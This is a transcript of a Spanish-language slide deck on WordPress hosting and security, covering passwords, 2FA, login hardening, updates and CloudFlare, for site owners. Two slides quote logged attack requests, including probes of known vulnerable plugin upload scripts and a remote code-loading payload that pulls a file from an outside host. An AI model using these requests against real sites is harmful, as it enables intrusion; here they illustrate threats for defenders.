Conceptos detrás de Wordpress: servidores y seguridad

Transcript

1. José Román Hdez @Manz Concept de servidores seguridad

2. None

3. ¿WordPress?

4. Dominio.com + +

5. COMPARTIDO DEDICADO PAQUETES NUBE (CLOUD) VPS

6. Software

7. + +

8. ¡WordPress!

9. Plugins Temas

10. Seguridad

11. Plugins Temas Gmail S E R VI CI O SI

    S T E M A C M S

12. Contraseñas de servicios Acceso al WordPress Actualizaciones y plugins Problemas

    de configuración Protección contra ataques

13. Contraseñas Recomendado: mayúsculas + minúsculas + números Mejor: palabras separadas

    por espacio + char raro
14. None

15. HowSecureIsMyPassword.net

16. None

17. Contraseñas Recomendado: mayúsculas + minúsculas + números Recomendado: no usar

    siempre la misma contraseña Mejor: palabras separadas por espacio + char raro Mejor: Usar un gestor de contraseñas

18. KeePassXC

19. None

20. Contraseñas Recomendado: mayúsculas + minúsculas + números Recomendado: no usar

    siempre la misma contraseña Recomendado: renovar contraseñas cada cierto tiempo Mejor: palabras separadas por espacio + char raro Mejor: Usar un gestor de contraseñas Mejor: Usar 2FA (Verificación de 2 pasos)

21. Auth (2FA)

22. Contraseñas de servicios Acceso al WordPress Actualizaciones y plugins Problemas

    de configuración Protección contra ataques

23. wp-admin

24. WordPress login Recomendado: Cambiar URL /wp-admin (plugins) Recomendado: Crear lista

    negra de accesos (IPs…) Recomendado: Instalar plugin para limitar accesos Mejor: 2FA en wordpress Mejor: Crear lista blanca de accesos (IPs, etc…) Mejor: Usar un CDN [hablaremos más adelante]

25. Contraseñas de servicios Acceso al WordPress Actualizaciones y plugins Problemas

    de configuración Protección contra ataques

26. versionad vA.B.C 5.2 2.4.39 10.3.15 7.3.5 mayor grandes cambios menor

    cambios regulares micro correcciones y cambios pequeños
27. None

28. Actualizaciones Recomendado: Instalar actualizaciones de WordPress Recomendado: Informarse, ¿qué software

    uso? Recomendado: Conocer el sistema instalado Mejor: Y además actualizar temas/plugins de WordPress Mejor: Asegurarse de que está actualizado Mejor: Si el sistema está obsoleto, migrar a uno nuevo

29. Contraseñas de servicios Acceso al WordPress Actualizaciones y plugins Problemas

    de configuración Protección contra ataques

30. 121.42.50.93 GET 95.61.64.206 GET 190.47.213.150 GET 193.201.224.17 GET 47.92.135.145 GET

    39.104.27.135 GET 178.62.12.122 GET 192.99.35.63 POST /wp-login.php /wp-login.php /wp-login.php /wp-login.php ... /new/wp-admin/ /wp/wp-admin/ /wp-admin/install.php?step=1 ... //wp-admin/admin-post.php?swp_debug= load_options&swp_url=http://netlabs. gr//images/code.txt&wpaa=phpinfo();e xit();

31. 51.75.89.132 GET 185.163.46.23 GET 23.228.96.82 GET 47.92.90.246 GET 185.225.17.191 GET

    94.158.245.114 GET /wp-content/themes/u-design/scripts/ admin/uploadify/uploadify.php /wp-content/plugins/reflex-gallery/a dmin/scripts/FileUploader/php.php /wp-content/plugins/wp-easy-gallery- pro/admin/php.php /wordpress/wp-config.php~ /wp-content/plugins/dopts/ /wp-content/plugins/formcraft/file-u pload/server/php/upload.php

32. Configuración Recomendado: No añadir o modificar configuraciones Recomendado: Asumir que

    vamos a recibir ataques Recomendado: Informarse sobre seguridad Mejor: Supervisado o realizado por un experto Mejor: Prepararse y proteger lo mejor posible Mejor: Auditar con empresa / profesional externo

33. Contraseñas de servicios Acceso al WordPress Actualizaciones y plugins Problemas

    de configuración Protección contra ataques

34. CloudFlare

35. CloudFlare

36. CloudFlare

37. None

38. ¡Gracias! José Román Hdez @Manz